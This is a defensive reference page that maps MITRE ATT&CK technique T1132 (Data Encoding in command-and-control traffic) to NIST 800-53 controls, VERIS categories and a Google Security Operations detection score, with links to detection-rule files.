T1132 Data Encoding Mappings

Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

View in MITRE ATT&CK®

NIST 800-53 Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
CA-07 Continuous Monitoring mitigates T1132 Data Encoding
CM-06 Configuration Settings mitigates T1132 Data Encoding
SI-03 Malicious Code Protection mitigates T1132 Data Encoding
CM-02 Baseline Configuration mitigates T1132 Data Encoding
SI-04 System Monitoring mitigates T1132 Data Encoding
AC-04 Information Flow Enforcement mitigates T1132 Data Encoding
SC-07 Boundary Protection mitigates T1132 Data Encoding

VERIS Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
action.hacking.variety.Evade Defenses Modification of the action (rather than the system, as in 'Disable controls') to avoid detection. related-to T1132 Data Encoding
action.malware.variety.C2 Malware creates Command and Control capability for malware. Child of 'Backdoor or C2'. related-to T1132 Data Encoding

GCP Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
google_secops Google Security Operations technique_scores T1132 Data Encoding
Comments
Google Security Ops is able to trigger an alert based on known indicators used by the adversary, such as data encoding techniques. This technique was scored as minimal based on low or uncertain detection coverage factor. This technique was scored as minimal based on low or uncertain detection coverage factor. https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/ioc_sigma/windows/powershell_encoded_command__sysmon.yaral https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/process_creation/emotet_process_creation.yaral https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/process_creation/suspicious_powershell_parameter_substring.yaral
References

ATT&CK Subtechniques

Technique ID Technique Name Number of Mappings
T1132.001 Standard Encoding 8
T1132.002 Non-Standard Encoding 8